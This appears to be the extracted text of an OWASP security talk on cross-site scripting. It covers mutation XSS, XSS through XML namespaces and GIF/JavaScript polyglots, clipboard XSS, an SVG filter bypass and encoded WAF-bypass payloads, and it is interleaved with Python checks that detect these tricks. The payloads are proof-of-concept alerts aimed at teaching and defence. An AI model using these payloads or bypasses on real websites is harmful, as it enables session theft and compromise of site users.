XSS - Do you know EVERYTHING?
- 3. • WE are Penetration Testing
• WE are Security Professionals
• WE are OWASP Lviv Chapter
• WE are Legio… oops
blog: http://owasp-lviv.blogspot.com
skype: y.bilyk
TEAM
- 4. AGENDA
- Power of XSS
- Read HttpOnly Cookies
- XSS via XML and GIF
- Clipboard XSS
- WAF XSS Bypass
- 7. What can XSS do?
CSRF and ClickJacking
XSS Tunnel & Port Scanning
Exploit machines & Botnets
And other BAD things (BeEF)
- 8. • Real payloads:
– http://www.xss-payloads.com
• BeEF Presentation:
– http://t.co/NLHtrxEuZ0
What can XSS do? (Links)
- 11. • Two ways to modify the DOM:
–Direct DOM manipulation
–Using innerHTML
innerHTML
- 12. <script type="text/javascript">
// "new" is a reserved word and does not parse as a variable name
var newText = "New <b>second</b> text";
function Change() {
// the string is parsed as HTML markup, not inserted as text
document.getElementById("myPar").innerHTML = newText;
}
</script>
<p id="myPar">First text</p>
<a href="javascript:Change()">
Change text above!
</a>
Example of innerHTML
- 13. Mutation XSS (Basics)
Web browsers tolerate
wrong HTML syntax
This can cause very
interesting behavior
In some cases a “safe” payload
can be transformed into an
XSS injection
- 14. Example of HTML mutation
<s class ="">hello <b>goodbye</b>
<S>hello <B>goodbye</B></S>
Original Data
Mutated data by browser
- 15. Example of HTML mutation (JS)
<img src ="test.jpg" alt ="``onload=xss()"/>
<IMG alt =``onload=xss() src ="test.jpg">
Original Data
Mutated data by browser
- 16. Mutation XSS (Some Examples)
<p style="font-family:'223bx:expression(alert(1))/*'">
<P style="FONT-FAMILY: ; x: expression(alert(1))"></P>
Original Data
Mutated data by browser
- 17. Mutation XSS (Some Examples)
<article xmlns="x:img src=x onerror=alert(1)">
<article xmlns="x:img src=x onerror=alert(1)">
<img src=x onerror=alert(1) :article
xmlns="x:img src=x onerror=alert(1)">
</img src=x onerror=alert(1) :article>
Original Data
Mutated data by browser
- 21. HttpOnly XSS
Apache before 2.2.22 incorrectly
processes long cookies
The generated error page contains
ALL cookies from the request
We can trigger such an error and
read the response HTML via XSS
- 25. • Can JS be run only from HTML?
–NO
• Can XML contain valid JS?
–YES
So just run JS from XML
XSS in XML?
- 26. • We can insert HTML tags as CDATA
–But this is JUST text in the browser view
• We can insert a valid XML element and
declare the (X)HTML namespace for the data
inside this tag
(X)HTML in XML
- 27. XML Namespace (Basics)
• XML Namespaces provide a method to avoid element
name conflicts (for example when merging two XML documents)
<table>
<tr>
<td>Apples</td>
<td>Bananas</td>
</tr>
</table>
<table>
<name>Coffee</name>
<width>80</width>
<length>120</length>
</table>
- 28. XML Namespace (Conflicts)
• Name conflicts in XML can easily be avoided using a
name prefix (h: and f:)
<h:table>
<h:tr>
<h:td>Apples</h:td>
<h:td>Bananas</h:td>
</h:tr>
</h:table>
<f:table>
<f:name>Coffee</f:name>
<f:width>80</f:width>
<f:length>120</f:length>
</f:table>
- 29. XSS in XML (Payload)
<x:script
xmlns:x=
"http://www.w3.org/1999/xhtml">
alert('XSS');
</x:script>
- 31. How does it work?
The browser's first decision is based
on the content type of the document
XML allows us to declare a
namespace (for example (X)HTML)
BINGO! The browser executes part
of the XML as (X)HTML (like SVG)
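As an added example (not code from the talk), a Python check a defender can run over XML that will be served to browsers, following the namespace rule the slides describe: it walks the document and reports elements declared in the XHTML or SVG namespace and any on* attribute. SAMPLE is a constructed document built around the slide's payload; the escaped markup in the first item stays plain text, as the CDATA slide says.

```python
import xml.etree.ElementTree as ET

# Namespaces a browser renders as active content when the document is served
# as XML (the slide's trick relies on the first one).
ACTIVE_NS = {
    "http://www.w3.org/1999/xhtml": "XHTML",
    "http://www.w3.org/2000/svg": "SVG",
}

# Constructed sample: a feed-like document carrying the slide's payload.
SAMPLE = """<?xml version="1.0"?>
<items>
  <item><title>Safe &lt;b&gt;text&lt;/b&gt;</title></item>
  <item><x:script xmlns:x="http://www.w3.org/1999/xhtml">alert('XSS');</x:script></item>
</items>"""

def split_tag(qname):
    """ElementTree spells namespaced names as '{uri}local'; return (uri, local)."""
    if qname.startswith("{"):
        uri, _, local = qname[1:].partition("}")
        return uri, local
    return "", qname

def active_content(xml_text):
    """List (local name, reason) for every element a browser may execute."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        uri, local = split_tag(el.tag)
        if uri in ACTIVE_NS:
            findings.append((local, "%s element in namespace %s" % (ACTIVE_NS[uri], uri)))
        for attr in el.attrib:
            attr_local = split_tag(attr)[1]
            if attr_local.lower().startswith("on"):
                findings.append((local, "event handler attribute " + attr_local))
    return findings

def is_safe_to_serve_as_xml(xml_text):
    """Untrusted XML that fails this check should not be served as text/xml
    or application/xml to a browser (serve it as a download instead)."""
    return not active_content(xml_text)
```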
- 33. GIF File Format
GIF87a .. ). ......
47 49 46 38 37 61 fa 00 29 01 e7 00 00 ff ff ff
ASCII
HEX
HEADER X Y SIZE IMG DATA
- 34. XSS GIF File Format
GIF87a /* ). ......
47 49 46 38 37 61 fa 00 29 01 e7 00 00 ff ff ff
ASCII
HEX
HEADER X Y SIZE IMG DATA
- 35. XSS GIF File Format (Final)
GIF87a/*).......
GIF87a/*).......*/=0;
GIF87a/*).......*/=0;
alert('XSS')
- 37. How does it work?
The JavaScript interpreter works only
with ASCII symbols
We need to modify some
non-printable symbols in the image
header (to create valid JS syntax)
Inject JavaScript code into the image
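As an added example (not from the talk), a Python upload check for the layout these slides describe: the two width bytes of the logical screen descriptor are replaced with "/*" (0x2F 0x2A, a width of 0x2A2F = 10799 px) and a "*/" appears later in the file. Both byte strings are constructed here from the header bytes shown on slide 33; this is a heuristic, and the reliable mitigation is to serve uploads with the correct Content-Type, X-Content-Type-Options: nosniff, from an origin that does not carry the application's cookies.

```python
import struct

# Constructed samples: the slide's header (width 250, height 297, packed 0xE7)
# followed by filler, and the same header with the width bytes set to "/*".
BENIGN_GIF = b"GIF87a" + struct.pack("<HH", 250, 297) + b"\xe7\x00\x00" + b"\xff\xff\xff" * 8
POLYGLOT_GIF = b"GIF87a" + b"/*" + struct.pack("<H", 297) + b"\xe7\x00\x00" + b"\xff" * 8 + b"*/=0;"

def gif_header(data):
    """Parse the signature and logical screen size; (signature, width, height) or None."""
    if len(data) < 13 or data[:6] not in (b"GIF87a", b"GIF89a"):
        return None
    width, height = struct.unpack("<HH", data[6:10])   # little-endian 16-bit fields
    return data[:6].decode("ascii"), width, height

def looks_like_js_polyglot(data):
    """True when the width field spells the JS comment opener and a closer follows,
    which is exactly what turns the header into tolerable JavaScript."""
    if gif_header(data) is None:
        return False
    return data[6:8] == b"/*" and b"*/" in data[8:]

def accept_upload(data, max_dim=8192):
    """Decide whether an uploaded GIF may be stored and served as image/gif."""
    hdr = gif_header(data)
    if hdr is None:
        return False, "not a GIF"
    if looks_like_js_polyglot(data):
        return False, "GIF/JavaScript polyglot layout"
    _, width, height = hdr
    if width == 0 or height == 0 or width > max_dim or height > max_dim:
        return False, "implausible dimensions %dx%d" % (width, height)
    return True, "ok"
```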
- 39. Clipboard (Basics)
Clipboard operations are not
simple memory copy operations
Data loaded from the clipboard
depends on the destination (e.g. Notepad)
Data stored in the clipboard
depends on the source (e.g. MS Word)
- 40. Clipboard XSS (How?)
Edit a font style in the document
(DOC, ODT, PDF, etc.)
Type or create some text with the new
font style in this document
Copy this text and paste it into a
text area on the victim site
- 41. </style><svg><style>svg {position:fixed}</style>
<style>svg {top:0}</style><style>svg {left:0}</style>
<style>svg {height:10000px}</style> <style>svg
{width:10000px}</style> <style>svg {opacity:0}</style>
<a xmlns:xlink="http://www.w3.org/1999/xlink"
xlink:href="?"><circle r="4000"></circle>
<animate attributeName="xlink:href" begin="0"
from="javascript:alert(document.domain)"
to="&" /> </a>
Clipboard XSS (Filter Bypass)
- 46. WAF XSS Bypass (Techniques)
Mixed Encoding
(Double, HTML, URL encoding)
Rarely used events of objects
and new HTML5 objects
JS-F**K Encoding
- 47. WAF XSS Bypass (Payloads)
URL Encoding + HTML Encoding + Unicode Encoding
%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D
%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B
%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B
%2526%2523x27%3B%2526%2523x29%3B%22%3E
<img/src="x"/onerror="prompt('XSS');">
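As an added example (not code from the talk), a Python normalizer showing why a filter that matches raw input misses the mixed-encoding payload above: it peels URL, HTML-entity and JavaScript escape layers in a loop until the string stops changing, then matches against the decoded form. SAMPLE is the slide's payload with the extraction spaces removed; the pattern is a detection heuristic only, and contextual output encoding in the application remains the actual fix.

```python
import html
import re
from urllib.parse import unquote

# Constructed sample: the slide's triple-encoded payload, spaces removed.
SAMPLE = ("%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B"
          "%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B"
          "%2526%2523x27%3B%2526%2523x29%3B%22%3E")

JS_UNICODE = re.compile(r"\\u([0-9a-fA-F]{4})")
JS_HEX = re.compile(r"\\x([0-9a-fA-F]{2})")
# Heuristic: tag start, on* handler attribute, or javascript: scheme.
MARKUP = re.compile(r"<\s*[a-z]|\bon[a-z]+\s*=|javascript\s*:", re.I)

def normalize(value, max_rounds=5):
    """Decode URL, HTML-entity and JS escapes repeatedly until nothing changes.
    The round limit keeps a hostile input from driving this loop forever."""
    current = value
    for _ in range(max_rounds):
        decoded = unquote(current)                       # %XX, including %25 -> %
        decoded = html.unescape(decoded)                 # &#x28; -> (
        decoded = JS_UNICODE.sub(lambda m: chr(int(m.group(1), 16)), decoded)
        decoded = JS_HEX.sub(lambda m: chr(int(m.group(1), 16)), decoded)
        if decoded == current:
            break
        current = decoded
    return current

def is_suspicious(value):
    """Match the pattern against the fully decoded form, not the raw bytes."""
    return MARKUP.search(normalize(value)) is not None
```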
- 48. WAF XSS Bypass (Payloads)
Rare objects events
<details ontoggle=alert(1)>
<div contextmenu="xss">Right-Click Here
<menu id="xss" onshow="alert(1)">
- 49. WAF XSS Bypass (Payloads)
JS-F**K Encoding
<img/src="x"/onerror="alert(1)">
Editor's Notes
- An HTML element’s innerHTML property deals with creating HTML content from arbitrarily formatted strings on write access on the one hand, and with serializing HTML DOM nodes into strings on read access on the other